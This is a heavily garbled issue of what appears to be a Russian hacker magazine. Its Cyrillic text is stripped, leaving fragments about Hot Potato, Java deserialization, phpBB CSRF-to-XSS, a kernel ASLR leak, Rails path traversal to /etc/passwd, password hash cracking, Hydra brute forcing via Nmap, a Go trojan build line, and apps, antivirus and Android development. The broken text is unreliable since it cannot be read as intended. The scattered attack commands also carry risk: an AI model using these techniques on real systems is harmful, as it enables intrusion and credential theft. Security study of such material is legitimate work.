Android
,
ANDROID
Android , :
Textpresso,
Zipwhip. ,
.
Satis Smart Toilet Bluetooth,
Android-. ( PIN 0000), .
,
. ?
, SoC
. , , WWW
- . , ,
,
IoT
, (
SoC , , , . . .). ,
/ ( , ).
, , .
, , , (
),
;
EoL .
, Android ( )
. ,
, , , . , , Android
. .
MOBILE:

BLACKBERRY PRIV

androidstreet.net
Android
,
. , ,
.
, .
? .
,
Android . GATCA: Elite, .
BlackBerry Priv, -.
Android BlackBerry .
,
, , Android .
, ( -
):
(
Root of Trust, UEFI Secure boot);
ASLR, ;
SELinux;
Pathtrust, ,
;
Linux Android ,
DTEK,
;
FIPS 140-2
, brute-force-;
- Enterprise-, -.
, ? ,
Android .
, BlackBerry
.

BlackBerry . Root of Trust
, , .
,
, SHA- /system
. .
Root of Trust
, Root of Trust , , ,
, . ,
, root
,
.
, .
: , ,
root. , , root,
, , -
.
: BlackBerry . ? ? ,
root? , Root of Trust , ?
,
.
, , , Xposed .
- BlackBerry Priv 2 .
.
, , (
Apple iPhone 4S, ). ,
BlackBerry .
ASLR
ASLR (Address space layout randomization)
, , PaX ( Linux) 2001 . , ,
, -
( ) .
ASLR ( , ),
, , , , - , , libc
( ).
ASLR , Android : 4.1, ( )
. , - Android,
(
zygote copy-on-write), ASLR ,
( ).
. ,
, CopperheadOS, ( 3 15 ).
BlackBerry Priv? , , - .
SELINUX
SELinux (Security Enhanched Linux) security- , .
( ,
). , SELinux ,
(, ) .
Android SELinux 4.2
, C C++
( , ).
(, ) Android
: , ( ) . SELinux
.
, , SELinux
. ,
.
,
( ,
). BlackBerry? .
PATHTRUST
Pathtrust QNX 6.6,
BlackBerry. , .
. -,
, Android .
,
, UNIX- (/system/bin ),
(
, SELinux). , , , , Linux, Android- , , .
- APK (
, ).
DTEK
DTEK BlackBerry,
. , : ,
, , , ,
.
.
, , : USB
, ,
- . , Google : BlackBerry Priv
,
, Google, , , . ,
.
( ) . , (, ) ,
. ?
. ,
Android 4.3 CyanogenMod 10.1 (, , BlackBerry). CyanogenMod
, BlackBerry : .
, Android 6.0,
, (Target
SDK: 23).
DTEK
,
FIPS 140-2
FIPS 140-2 , ( , ). ,
, ( ),
, (
). CMVP (Cryptographic Module Validation Program)
FIPS 140-2,
.
, ,
BlackBerry Priv
. ,
140-2 .
Linux, OpenSSH, OpenSSL. BlackBerry Priv FIPS 140-2 , , ,
AES, Android.
, , FIPS 140-2 2002 .
, BlackBerry, ,
Enterprise-, , . , GATCA: Elite, , ,
,
Android (256- , ,
) ( SIM-).
.
MOBILE
#16.
:

,

,
,
,

. .
Text Aide
: Android 4.0+
:
TEXT AIDE
, ,
,
? ,
,
. Text Aide
,

.
:
,

, . :
, Define. : .
,

.
. Text Aide , ( Speak
) .
. , , Expand
.
,
@, Text Aide . Dict Aide, Text Aide
.
Pintasking
: Android 4.1+
: / 217 .
PINTASKING

, , , Pintasking
. Pintasking : ,
, Tap to pin, , ( ,
) . , , .
Pintasking ,
, , pin
,
.
, Pintasking , ,
. .
Focus Notify
: Android 4.2+
:
FOCUS NOTIFY
TODO-, Google Keep Evernote
. Focus Notify . ,
TODO-
Material.
,
. ,
.
,
,
.
Textpand
: Android 5.0
:
TEXTPAND

Text Aide,

, .
,
.
-, , ,
, ,
, , .
,

Google Drive. Textpand
, .
.
EASY
HACK
GreenDog , Digital Security

agrrrdog@gmail.com,,twitter.com/antyurin
WARNING
.
, ,
.
WINDOWS
HOT POTATO
,
Windows SYSTEM. Windows, ,
. Hot Potato.
, ,
Easy Hack.
, ,
.
Google.
, , , Windows , NTLM ( ). -
SMB, HTTP NTLM, . -

SMBRelay. Microsoft ,
relay , .
Google proof of concept, , WebDAV NTLM-,
SMB .
.
PoC . -, ,
WebDAV. -,
Microsoft , .
Foxglove Security .
.
, Windows ,
.
WPAD , -.
, Windows Update.
, ( ).
WPAD- PoC
WebDAV- , Windows.
, WPAD . NBNS spoofing.
-, NBNS spoofing . Windows
WPAD, DNS-, , DNS,
, NBNS (NetBIOS
Name Service). UDP NBNS. ?
, ,
.
. NBNS
TXID. - , ,
. 2 , 65 536
. NBNS-
TXID. ( lookback-),
.
.
NBNS- WPAD- ( -), - .
, . - ,
, NTLM-.
SMB RCE SYSTEM.
Hot Potato :
- ? . - ( ). .
. -,
, WPAD DNS-, NBNS WPAD.
UDP- , DNS- ,
. DNS-
, NBNS.
-, Foxglove , TXID
NBNS- . , NBNS- . ,
WPAD - .
JAVA-
SUPERSERIAL
Java- Easy
Hack, ,
. ,
,
bug bounty. !
, Easy Hack
, Java.
:
, .
. -, ,
, . -, ,
.
, . ( )
( ).
, , .

Burp Suite SuperSerial. , .

, Base64.
,
( ). :
, Java-,
.
SuperSerial SuperSerial-Active.
Burp, Java-. (
ysoserial) URL.
-. Out of band (OOB).
, URL
. , , .
-, DNS-, ,
DNS- .
RCE SAML XSLT

XSLT, , . XSL-
XML. XSLT ,
XSL, .
, XML-, XSL-, . .
, XSL- XML. -, , . namespace: xmlns:xsl=http://www.w3.org/1999/XSL/Transform.
, XSLT- XML
c XXE. XSLT ( XML-) .
, XSL XML,
SVG,
XML- XML Digital Signature.
XML DSig XML-.
XSLT- , . , . ,
( , ),
XSL- . Transform ( Transforms).
.
XML- c
, ,
XSLT-. - , XML DSig,
, - .
,
. , , .
, .
, XML DSig ,
Security Assertion Markup Language (SAML).
XML, . ,
. , .
? SAML,
XML DSig, , , XSLT-.
RCE. ! ,
: ,
XML DSig .
,
Digital Security
b.ryutin@tzor.ru
@dukebarman
dukebarman.pro
WARNING

.
,
,

.
CSRF-
phpBB,
. kASLR ,
Ruby on Rails.
CSRF- PHPBB
CVSSv2:
N/A
: 25 2016
:
Lander Brandt
CVE:
N/A

BBCode. BBCode , , HTML
JavaScript .
./phpbb/
phpBB/posting.php, , . , , , HTML. .
, . request_
var(). \phpbb\request\request_
interface::variable(),
. $_GET $_POST. trim() .
, , POST,
, , GET.
CSRF-.
, CSRF- phpBB. .
check_form_key() , CSRF,
, , . .
, CSRF .
.
add_form_key() check_
form_key(). , add_form_key()
check_form_key().
.

add_form_
key() check_form_
key()
check_form_key(), add_form_key(),
, .
, , .
: acp_bbcode.php acp_extensions.php.
acp_extensions.php ,
phpBB . CSRF- , , . .
(acp_bbcode.php) ,
POST-, request_var() . , CSRF-, BBCode
GET-.
XSS,
. phpBB , , ID .
SID cookie, .
-,
.
, IP,
.
.
XSS, SID document.location.
EXPLOIT
XSS
CSRF
phpBB
, , .
TARGETS
phpBB < 3.1.7-PL1.

SOLUTION
LINUX,
KASLR
CVSSv2:
N/A
: 24 2016
:
Marco Grassi
CVE:
N/A
ASLR (Address Space Layout
Randomization) .
kASLR , (k kernel). kASLR
, . .
/proc
Android, WCHAN. (wait
channel), , . ps -l.
wchan ,
/proc/pid_of_interest/stat. . , ? ?
.
18446744071579755915 , ,
, hex :
>>> hex(18446744071579755915)
'0xffffffff810de58bL'
Ubuntu 14.04, , kASLR

,
.
EXPLOIT
. , /proc/pid/stat , :
1. .
2. WCHAN ASLR.
3. .
4. .
: , /proc/sleeping-pid/stat, , ,
.
, , , kASLR, .
Python.
.
marco@marco-l:~/Documents$ python infoleak.py
Leaking kernel pointers...
leak: 0xffffffffb70de58b 18446744072485725579
kASLR slide: 0x36000000
kASLR,
.
TARGETS
kASLR .
SOLUTION

RUBY ON RAILS
CVSSv2:
N/A
: 25 2016
:
John Poulin
CVE:
CVE-2016-0752
Ruby on Rails, . ( ,
render params:id(), .
RoR ,
. ,
show show.html.erb, .
, ,
, ,
HTML, JSON, XML .
(ERB, HAML ). , , . . Rails ,
file:.
.
, ,
template. ,
. - ?
?
. ,
. - .
, , app/views/
user/#{params[:template]}. ,
dashboard,
app/views/user/dashboard.{ext}, ext
: .html, .haml, .html.erb .

dashboard
,
../admin/dashboard?

../admin/
dashboard
,
, RAILS_ROOT/app/views, RAILS_
ROOT . , , /etc/passwd, .
/etc/passwd
, , ,
? , config/initializers/
secrettoken.rb.
config/initializers/secrettoken.rb_ file
,
. , .
EXPLOIT
The Anatomy of a Rails

Vulnerability CVE-2014-0130: From Directory Traversal to Shell Rails, .
, .
LFI, .
, (ERB). ( , CSV).

, Ruby- -.
, . Ruby on Rails , , , ( ,
development.log).
,
URL- .
.

development.log
development.log.
ls

ls.
Metasploit, .

CVE-2016-0752
.
,
RoR.
TARGETS
Ruby on Rails 25 2016 .

SOLUTION
InsidePro Software
www.insidepro.com
,
( ). , ? ,
? ,
,
?
?
, ( . hash cracking),
, , , . ,

.
. , .
( ) .
, ,
, IP-, . ,
, ,
. ,
, .
.
, , . , , . ,
. ?
? , ,
? .
. 1.
(GPU).
(CPU) , GPU. GPU oclHashcat, Windows,
Linux,
NVIDIA, AMD. Open
Source, GitHub, .

hashtopus. GPU-
John the Ripper (JtR) Jumbo, ,
-
.
CPU , hashcat JtR.
Hash Manager, , ,
. , ,
, , ,

.
, , GUI , , (. ). (BAT CMD),
.
, , , .
. ,
,
(. . 2).
. 2.

, ,
, , .
( )
AMD, /. sm_50 (Maxwell) NVIDIA ,
, , . NVIDIA GTX 980Ti (. . 3).
InsidePro ( )
165 MD5 15
. , , . , , AMD
. , c 12001300 .
. 3. GTX 980Ti

CPU, , , . GPU,
CPU , , GPU
. (SSE AVX )
,
, , .
-, CPU GPU
? , .
( )
CPU , .
GPU

, ,
CPU ,
RAM.
, CPU GPU,
Intel Xeon Phi. , , , ,
, .
, 60
( ), 240 . bcrypt (
) , john-users bcrypt. , ,
.
, FPGA (),
? , , SHA-256,
(
SCRYPT ). , ( ) ,
.
. , , MD5, . Altera, Xilinx
,
.
,
. ? ,
.
1. ( wordlist).
,
, .
.
2. () InsidePro HashKiller
, , :. , . ,

.
3. , , . , . ,
, .
,
, ,
,
,
.
, , ,
.
,
, ?
- cmd5.ru.
hashchecker.de, , , , .
. , , Hash Finder.
500 -
- ,
, .
( ) , .
:
forum.insidepro.com;
forum.hashkiller.co.uk;
forum.antichat.ru/forums/76.
,
.
, , .

. , ,
. .
, .

:
,
, ;
, , , ;
,
, ,
.
, . - -
(, grep), - Perl, - . , , : , ,
, , .
, . hashcat , JtR , Windows
Hash Manager. 70 ,
= . , , ,
BAT-, .
64- .
BAT-, , , , Magento :
REM 35
ExtractLinesByLen.exe %1 35 35
REM 2.txt
MOVE /Y %1.Lines 2.txt
REM
IsCharset.exe 2.txt ?h 1
REM
IsCharsetInPos.exe 2.txt 33 ':'
IsCharsetInPos.exe 2.txt 34 ?l?u?d
IsCharsetInPos.exe 2.txt 35 ?l?u?d
REM ! 2.txt Magento
Hash Manager, Bonus, 30

, .

, . ,
, ,
CMS
, IPB 4
bcrypt. , -
PBKDF2 bcrypt,
.
, .
- MD5, SHA-1, SHA-256 SHA-512
.
GPU- CPU-.
. - (. ), ,
. ,
CMS, . . ,
, ,
.
, - , , 123456.
(, ), , . ,
-, , ,
, email. . , Hash Manager, Bonus\
SearchAlgorithm BAT-
( 400),
Unicode, ( ) .
, , . - ?
?
, . , ,
. . ,
. ,
. ,
, . , .
, .
, ,
.
: , ,
. .

,
. , ?

, . ,
,
, ( ) -. ?
,
Linux- crypt() sha512crypt bcrypt.
,
( ). ,
, .
, ( , 200500 ) PHP- md5. (, ,
vBulletin osCommerce), PHP-,
, . ,
, (
, GPU ).
MD5 50
100 . ,
( , , PHP-).
.
(, SHA256 SHA-512) 32 ( ). , , , MD5 ( ),
, .
, , CMS, CMS
, (-) , CMS
. .
: ,
, , .
!

, , . ,
, ? .
? , . .
Hash Manager, Top100xx.dic. ,
,
. .
, , , .

? , ! Crack Me If
You Can, KoreLogic DEF
CON, Hash Runner Positive Hack Days.

( , 48 ) , .
, . ,
InsidePro, hashcat john-users, . , .
,
, - . ,
( )
, .
, , .
. 4.

DEF
CON 2012
, .
, . , ,
, , , , .

, . ,
,
: ,
. ?
.
, ,
Windows FAR Manager.
.
(, Hash Manager), , .
( F2)
, ,
.
, F2 .
FAR
, , , .

,
, .
,
,
-, , ,
!
THERE IS NO 100%
GUARANTEE

@ygoltsev
(penetration testing)

. - , - , -
. , ,
, .
INTRO
- , ,
,
, - , . (FUD! Deal with it!).
, .
, .

. , .
.
.
. ,
, .
2016 :
, ,
. , ,
.
2013 . Affinity Gaming,
, .
Trustwave, , , .
Trustwave, ,
, , , ,
.
Trustwave , . , ( , ).
, , ( , , ).
. , ( Affinity), .
2014 Affinity Gaming
Ernst & Young. E&Y
, , , Framepkg.exe. :
Trustwave, .
, : ,
. PRELIMINARY STATEMENT
, , Trustwave . Trustwave.
IT-security Mandiant.
, Trustwave , ,
. Trustwave
, .
, .
, Affinity , ,
. Trustwave ,
2015 Affinity Gaming .
, , . , Trustwave : . , -
, , , .
PIECE FROM MY REALITY
. . ,
.
, . , .
, - . ,
. .
, ,
,
. . pwnage , . ,
,
, .
, ,
.
. , . , ,
, .
. , ,
- .
, ,
.

pwnage. , , , . , , , - sqlmap .
, . , pwnage , ,
, . , ,
,
.
, RCE.
. . ,
.
, . , ,
, . , ,
, .
. , .
- Trustwave
, , . (
), ,
. .
, , . , . ,
: .
,

. , , , , .
. ( ), ,
. ,
.
. ,
. ,
, -. ,
, , offensive-,
defensive-.
OUTRO
Trustwave . -
-
. ,
- -. , , . Stay tuned!

Vulnerability Assessment
Open Source Security Testing Methodology Manual
The Penetration Testing Execution Standard

PentesterLab
Penetration Testing Practice Lab

Open Penetration Testing Bookmarks Collection
Right way to contribute
DC7499
DC7812
2600 russian group
NMAP

lely797@yandex.ru
NSE-
Nmap , , , , . Nmap
. , Nmap .
, . Nmap
, .
NMAP
, , Nmap,
. , , :
Nmap - , , . ,
NSE;
NSE (Nmap Scripting Engine) Nmap,
, :
Nmap, . NSE Lua;
Lua , JavaScript.
. 1. Nmap

, Nmap . /
.

. , Nmap, , . , :
.
, THC-Hydra (, HTTP-Basic, SSH, MySQL). , .
, ?.. ?
, Hydra /
(, PostgreSQL). :
Nmap;
THC-Hydra;
.
Nmap / Hydra, :
$ sudo apt-get install nmap hydra
, . Nmap
*.nse. . Vim:
$ vim hydra.nse
NSE-
, ,
. ,
, (
), , ,
, , , . .
(DESCRIPTION)
, ,
, .
, / PostgeSQL,
:
:
-- ;
--[[ ]] ;
@usage, @output, @args ,
, .
@usage .
(hydra). ,
/<path to nmap>/nmap/scripts/,
. . --script-args "<some arguments>".
(lpath)
(ppath). : login.txt password.txt .
, (CATEGORIES)
NSE- ( ). , Nmap
, , .
:
auth , ;
brute ,
;
default , .
, :
, , , , ;
malware , .
, auth, :
$ nmap --script=auth example.com
. brute.
:
(AUTHOR)
. :
(LICENSE)
Nmap ,
NSE-.
. Nmap :
.
(DEPENDENCIES)
NSE-, . ,
,
dependencies .
(HOST & PORT)
Nmap , .
:
prerule()
, ;
hostrule(host) , ;
portrule(host, port) , ;
postrule()
. ,
.
. (5432) (postgresql), . shortport, NSE,
. port_or_service (ports, services,
protos, states), ports , services ,
protos (, udp), states .
true , , ports - services, , , false.
PostgreSQL, :

,
, .
, ,
. Lua :
local <_>. . Lua
require. :
:
nmap NSE,
Nmap;
shortport NSE, ,
, ;
stdnse NSE, NSE-;
string Lua, ;
table Lua ( );
tab NSE Nmap .
, .
NMAP LIBS
Libraries.
(ACTION)
. action , . ,
, ,
, Nmap.
action- :
action-:
Nmap , , , . Nmap postgresql, Hydra

postgres.
, :
( task).
, ( ), (
):
.
, , :
:
-L (-l) <__> (<_>)
-P (-p) <__> (<_>)
t <_> ( 16)
-e ns : n , s

-s <_>
IP ( )
. , .. Lua
.
HYDRA
THC-Hydra .
, str. io.popen(str). str

(handler), .
s ( . 2).
. 2. Hydra
, - login:password,
regex. string match,
login password
, .
, ([^%s]*),
(%s ). ,
:
( if (port.state
== "open") then end ). , . , , Nmap.
, Lua #
. # .
action- ( end).
LUA DOCS
Lua .
/<path_to_nmap>/nmap/scripts/.
. , PostgreSQL.
POSTGRESQL
1. . PostgreSQL .
:

$ sudo apt-get install postgresql
$ sudo service postgresql status
$ sudo service postgresql start
$ sudo su
$ adduser postgresql ( , qwerty)
$ exit
2.
Linux-. postgresql:qwerty. :
3. postgresql:

$ su - postgres

$ psql template1

template1=# CREATE USER postgresql WITH PASSWORD 'qwerty';

template1=# CREATE DATABASE test_db;

template1=# GRANT ALL PRIVILEGES ON DATABASE test_db
to postgresql;

template1=# \q
.

login.txt postgresql
password.txt qwerty:
. 3.

:
$ nmap --script=hydra localhost
, . 4.
. 4.
Nmap
,
login.
txt password.txt . ,
lpath (
) ppath ( ).
:
$ nmap --script=hydra --script-args "lpath=<path_to_file_with_logins>,

ppath=<path_to_file_with_passwords>" localhost
. action-,
lpath ppath
:
. , (
path_login path_password):
, .
? Nmap Hydra.
, .
. . portrule :

. ,
. (, / ).
HYDRA.NSE
, ,
GitHub.

(,
). Nmap
-d (. . 5). ,
:
$ nmap --script hydra localhost -d
Nmap .
, , (print).
. 5.
NSE Nmap. , -
. .
D1g1 ,
Digital Security
@evdokimovds
WARNING
!

! ,

!
INSIDEPRO HASH VERIFIER

Hash Verifier ( ) .
:
InsidePro
URL:
verifier.insidepro.com
:
:
;
30 , ;
(
1000 );
;
;
(: ::).
,
, , .
, , ,
.
,

.
INSIDEPRO HASH FINDER

Hash Finder
.
:
InsidePro
URL:
finder.insidepro.com
:
:
;
100 , ;
( 100 000
);
(
);
;
.
:
1.
( 500 ), ,
.

.
2. ,
.
,
,

.
INSIDEPRO HASH MANAGER

Hash Manager
.
:
InsidePro Software
URL:
www.insidepro.com/
download/HM.zip
:
Win
:
Ahmed Aboul-Ela
URL:
github.com/aboul3la/
Sublist3r
:
Linux
:
( );
400 ;
70
, ( , ,
, SQL,
);
64- , ;
, ,
;

;
;
Unicode;
.

Sublist3r Python, - .
( ) -
. Sublist3r
:
Google;
Yahoo;
Bing;
Baidu;
Ask.
,
. , , , .
, Netcraft DNSdumpster. , Sublist3r
subbrute TheRook,
, .
:
Requests;
dnspython;
argparse.

example.com:
$ python sublist3r.py -v -d example.com
, ,
.
:
nottinghamprisateam
:
Peter Cunha
URL:
github.com/petercunha/GoAT
:
Windows
:
Saif El-Sherei Etienne
Stalmans
URL:
github.com/sensepost/wadi
:
Windows 10
:
Florian Roth
URL:
github.com/neo23x0/
dllrunner
:
Windows
GOLANG ADVANCED TROJAN

GoAT , Go Twitter C&C-.
GoBot SaturnsVoid. GoAT
,
-
.

go build -o GoAT.exe -ldflags

"-H windowsgui" "C:\GoAT.go"
, -
- .

. Go
PowerShell. . ,
Trojan.Encriyoko.
WADI FUZZING
,
.
Wadi Python Edge Microsoft Windows.
: WinAppDbg
Twisted -. Edge
MicrosoftEdgeCP.exe, RuntimeBroker.
exe MicrosoftEdge.exe . -
- Googles PyV8 .
,

. ,
-
Wadi,
.
DEFCON 23 -. Wadi
Fuzzer.
DLL -
DLLRunner DLL

. DLL-
rundll32.exe file.dll,
PE- ,
, - . , , , :
rundll32.exe path/to/file.dll,exportedfunc1 "0"
rundll32.exe path/to/file.dll,exportedfunc1 "1"
rundll32.exe path/to/file.dll,exportedfunc1
"http://evil.local"
rundll32.exe path/to/file.dll,exportedfunc1
"Install"
...
,
,
, .
.
MALWARE:
POWER OF
COMMUNITY 2015:

defec.ru, twitter.com/difezza
Power of Community
,
2006
. ,
,
.

,
CTF,
. ,
, , ,
scoreboard .
, PoC
The Grugq
APT
clicking-clicking war

CLICKING WAR
. , -
PoC, ,
. -- :
. : .
, ,
The Grugq.
, , 0day. The Grugq APT, clickingclicking wars ,
, .
(Wenyuan Xu),
(Zhejiang University), ,
,
, . , - :
;
;
;
;
.
(Wi-Fi, NFC, ,
GPS, ).
,

(device fingerprinting).
, ,
, .
-
.
, .
,
: ,
( , ,
).
. ,
, , . , .

, , . - , , - .

: ,
, , .
- , ,
.

,
, .
, ,
, , GPS-,
. , , ,
,
.
,
, ,
. .

:

. :
, ,
.
,
.
Opppa... Gangnam style
MALWARE
84ckf1r3
84ckf1r3@gmail.com

.
Kaspersky Free.

, -? ? .

. VirtualBox Windows 7 - .
.
- (TCPView, Autoruns VirusTotal
API, ProcessExplorer, Regshot, AVZ ).
Clean MX, / .
, .
IE (
). - .
KASPERSKY FREE
16.0.1.445 147,8 . Kaspersky Free 232 . , ,
, , . KIS KTS.
Kaspersky
Free
.
, . ,
.
Google Play Kaspersky Internet Security, Kaspersky
Protection Toolbar. . .
Kaspersky Free
Kaspersky Free .
Microsoft SmartScreen,
. .
Kaspersky Free MS SmartScreen

. ,
Kaspersky Free . , 17 - VirusTotal.
Kaspersky Free ,
Kaspersky VirusTotal Downloader.Win32.Bundl.

aq, .
, , .
AVIRA FREE ANTIVIRUS 2016
Avira Free
. Avira -. , .
, .
Avira
Avira 1329 , \Program Files\Avira\. \ProgramData\Avira . Avira Free

( ), .
.
-. -, . ,
.
Avira Free
Downloader.Win32.Bundl.aq .
, Avira. .

Avira
js-, Avira . .
Avira
Remove
. Avira
, .
ZIP Avira
.
Avira ZIP
Avira , PUA (
).
Avira PUA
, , Avira
, . .
Avira -
Kaspersky Free, Avira SmartScreen.
Avira MSS
AVG ANTIVIRUS FREE EDITION

AVG . . AVG Free
192, ,
. ,
. , , AVG Free, ?
AVG Free
,
. 30- .
AVG Free .
AVG
AVG Free AVG SafeGuard by Ask Ask ,

AVG Android.
, Kaspersky Free,
AVG .
.
AVG
AVG
.
AVG
ZIP AVG
.
AVG
- js-, . AVG ,
, SmartScreen... .
. AVG

. .
.
AVG
-,
VirusTotal, AVG . , .
AVG
MALWARE
AVAST! FREE ANTIVIRUS (11.1.2245)

Avast! : Google Chrome Google Toolbar IE. 604 ,
Avira Free.
. . ,
. ,
Avast.
MSS Avast! .
() .
Avast!
,
js- Avast! , - .

.
Avast! JS
Avast! ,
.
Avast!
, VirusTotal 34 , Avast! . , MSS.

Avast!

Microsoft, 10,
. , ? , Avira :
DANGER
, ,
,
,
( ) -

(, ID ,
.
IP- , , , ,
, IMEI- , ,
, , , SIM, ,
.
,
GPS/Wi-Fi/ ... , , : , , , email,
, , , ( )
INFO
,
.
, .
.

, . ,
, .
.
,
,

,
.
,
,
, , :

, ...
,
.

.
, .
,

, .
Kaspersky Free
, .
.
Kaspersky
Security Network, KSN . ,
, , ,
. .
KSN
, -. ,
.
, .
,
.

, .
Kaspersky Free . KIS, ,
KSN.
Avira . , . .
,
.
Avast! ( ) .
, ,
, .

.
AVG ,
. ,

.
WWW
Kaspersky Free
Avira Free Antivirus 2016
AVG AntiVirus FREE
Avast! Free Antivirus
WARNING

.
.

.

.
GIT HOOK

code review printf, console.log?

?
( Bitbucket),

? !
Git Bash!
,
Pushwoosh, Inc.
nikita.arykov@gmail.com
git push --force
GIT HOOKS
-callback, Git, .
Observer .
commit, apply patch, merge, push,
rebase Git. ,
commit message,
/ .
Git,
Subversion, Mercurial, Bazaar.

:
(developer,
lieutenant, dictator).

, .
,
$PROJECT_DIR/.git/hooks/.
.
, git commit --noverify.

, :).
.

$PROJECT_DIR/hooks/, . . , .
Git hooks : Python, PHP, Ruby,
PowerShell . Bash.
Hook , , 0,
(git commit, git push ) .

git init , .
$ captain@jolly-roger:/PONY/.git/hooks$ ls
applypatch-msg.sample post-update.sample pre-commit.sample
pre-rebase.sample
update.sample
commit-msg.sample
pre-applypatch.sample pre-push.sample
prepare-commit-msg.sample
, , .sample
(cp pre-commit.sample pre-commit), ,
; chmod +x pre-commit.
,
.
.
INFO
hooks

Git

man githooks.
push
pre-receive, ,
, git push. , 0,
.
, (),
master-,
.
, pre-receive hook black-list:
. changedBranch , .
blockedUsers,
1 blessed repository.
white-list,
(Release managers)
master-. branch permissions Bitbucket
Server .
Branch
permissions

Bitbucket Server
INFO
printf shall not pass

- , Print debugging (, -, Tracing)
. blessed repository,
Git hook ( pre-commit,
pre-receive):
master-

. branching
workflow,
gitflow GitHub
flow, ,
master-

.
git diff --cached --name-only , ,

[[ -f $FILE ]], ,
. . ,

, . code review
:
$ git commit -m "fix critical bug"

debug.js contains denied word: console.info("hm,

is this dead code?");

debug.php contains denied word: var_dump($a);

Aborting commit due to denied words
.
JetBrains, , hook .
hook IntelliJ IDEA
commit message
, commit message issue
trackera, JIRA. commit-msg, , .
-m
git commit -m "commit message".
PONY.
:
. GitLab
commit message.
INFO

,
JIRA.

,

code review
.
commit message GitLab

, , unit-, , . , . PHP, Ruby, Go,
.
, . staging area . t.php :
t.rb :
Git hook
:
$ git commit -m "magic commit message"

PHP Parse error: parse error in t.php on line 4

Errors parsing t.php

t.rb:1: unterminated string meets end of file

Aborting commit due to files with syntax errors
,
.
Jenkins-
, continuous integration, .
, Jenkins, , . https://jenkins-ci.org/ https://jenkinsci.org/ Git plugin Jenkins,

curl https://jenkins.your_company.com/git/notifyCommit?url=
https://repository.your_company.com/PROJECT
hook post-receive,
, . Build Token Root Plugin,
.

, $GIT_DIR/hooks pre-commit
pre-receive hook.
#!/bin/bash
"$(dirname "$0")"/check-syntax
"$(dirname "$0")"/block-debugging-code
"$(dirname "$0")"/unit-tests
. , - , .
,
?

, . , GitHub

ssh .
. , Puppet, hooks , Grunt.

Git hooks , . :

, ,
php codesniffer, gofmt, pep8 . code review
- .
- ? lolcommits GitHub.
.
- , , GNU Aspell
.

!

ANDROID

zobnin@gmail.com
, Tasker Locale,
Android iOS. , ,
root, , ,
Linux- . iOS
? Binder IPC/RPC-, Android.

Android, , ,
. , Android-: ) ( ) SD-
, )
( Android 6.0 ) ) , .

( Android
Linux),

( ART,
).
,
: ,
, ,
?
Binder, BeOS, Android.
Binder COM Windows, .
Android Binder,

, . Binder
, ,
. Binder
, , , , ,
. , ,
Binder.
, , ,
- Binder, ,
Android (,
/dev/binder). , , Binder.

Android Intent Binder
, , , , . :

Binder
. SecondActivity, OnCreate(), :
, . ,
, OnCreate() SecondActivity .
, , . ,
. :
, . : ,
(SeconActivity), , (com.my.app.
MY_ACTION), ... - , , .

. , , ,
.
, ,
:
( android.permission.CALL_PHONE), , Phone Intent.ACTION_CALL (

, , intent-filter). ,
,
, ,
( , ).
, , Intent.ACTION_VIEW
-, , ACTION_SEND
( ), ACTION_SEARCH .

, . ,
, android.intent.action.MAIN.
intent-filter MainActivity .
, , , .
, Binder, .

,
, ,
, - . Android .
- : ,
, , , , .
.
,
, ,
, (, , ).
.
.
.
, , ,
,
. ,
, .
, , , -.
, , . , CONNECTIVITY_CHANGE, ,
: .
, . ,
intent-filter:
filters/ConnChangeReceiver.java:
NetTools isConnected():
, : CONNECTIVITY_CHANGE , , , , .
, 8.8.8.8
( , ),
, ,
,
, , , ,
, . !
:
, , intent-filter android.intent.action.BOOT_COMPLETED.
, , .
][
,
. , ( android.intent.action.ACTION_SCREEN_ON),
(NEW_OUTGOING_CALL PHONE_STATE),
, .
.
.
:
, , ,
,
getAction() ( NEW_
OUTGOING_CALL, PHONE_STATE, ), getStringExtra(). , ,
, ,
TelephonyManager , .
, , ,
, , , IRC,
Telegram.
, Tasker. , ,
(
Android). , ,
, , ,
.
Google Now, , , , Binder ACTION_SEND.

, ,
,
, ,
.
MATERIAL DESIGN
ANDROID
.
,
!

mail@s-melnikov.net,
www.s-melnikov.net
Android- 5 6
,
Material Design. ,
Google, ,
,
. ,
Android ,
. Android 6, , , .

Material Design Android
Google,
Google I/O 2014 .
,
( ) .
, . Google,
,

(. 1).
,
, (. 2).
(Floating Action Button),

. ,
Gmail .
, - . 1. Material Design
(,
) .
, , , ListView FAB
.
. 2. ? !
Material Design
( :).
. .), Lollipop .
. , Ripple- ( ), . , , .
Material Design ( !) Google, .
ANDROID APPCOMPAT VS. DESIGN SUPPORT LIBRARY
Android 5 SDK Google AppCompat ( ActionBarCompat),
aka v7. Material Design
2.1 (API Level 7). Toolbar,
ActionBar , ( , , ).
, Material- :
EditText, Spinner, CheckBox, RadioButton, Switch, CheckedTextView.
, RecyclerView ( ListView), CardView () Palette ( ).
,
, .
, , , , , , Gmail Android 4, ,
AppCompat . -
AppCompat
Material Design.
, Google , , , -
AppCompat, Design Support Library. -: (Navigation View), (Floating Action Button), (Snackbar), Toolbar .

.
,
, .
, SDK, Android Studio ...

Android Studio,
dependencies build.gradle :

23.1.1, . , IDE
, ,
.
COORDINATORLAYOUT, TOOLBAR --
CoordinatorLayout,
() , ( ,
CoordinatorLayout FrameLayout). ,
. 3 .
, (), (. 4). , , , .
. 3.
. 4.
( ,
):
, CoordinatorLayout : AppBarLayout FrameLayout. : , RecyclerView ListView.

. 3 RecyclerView (FAB).
AppBarLayout FrameLayout , ,
layout_behavior="@string/appbar_scrolling_view_behavior",
AppBarLayout.
AppBarLayout -
LinearLayout, - ( ) . CollapsingToolbarLayout,
Toolbar. , CollapsingToolbarLayout AppBarLayout. AppBarLayout
layout_height,
192dp.
layout_scrollFlags . scroll, AppBarLayout ,
( ). , exitUntilCollapsed, ,
Toolbar . ,
, , ( ) .
, ...
contentScrim="?attr/colorPrimary" , CollapsingToolbarLayout.
, . 4 Toolbar - , .
, @android:color/transparent.
, ,
(), Toolbar (, , ) ImageView ()
CollapsingToolbarLayout. layout_collapseMode="parallax"
ImageView Toolbara. ,
.
, ,
, . , :
, , ! SetSupportActionBar ActionBar
Toolbar . , setTitle. Toolbar
Android Developers.
ImageView
Picasso .
Google, . Android ? setImageResource
Out of Memory ? ,
, , . , , BitmapFactory, ,
, , , Picasso,
UniversalImageLoader. , ...
SNACKBAR
Snackbar ,
(. 5). ,
( Action), (,
). - Snackbar
( - . 5. Snackbar
Toast).
:
, CoordinatorLayout,
Snackbar (. 6).
, FAB Snackbar .
CoordinatorLayout, (. 7).
. 6. CoordinatorLayout
. 7. CoordinatorLayout
EDITTEXT FLOATING LABELS

Material Design
EditText (. 8), . (Hint) , . , (. . 8), . (
):
,
. :

(. 9):
. 9.
TextInputLayout
. 8. ?
WWW
